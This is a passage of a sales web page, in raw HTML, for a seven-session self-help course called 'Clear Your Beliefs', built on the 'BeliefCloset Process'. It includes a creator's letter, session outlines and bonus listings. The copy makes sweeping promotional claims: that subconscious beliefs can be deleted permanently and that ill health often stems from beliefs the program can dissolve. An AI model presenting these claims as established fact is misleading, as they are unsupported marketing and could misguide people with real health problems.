<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs 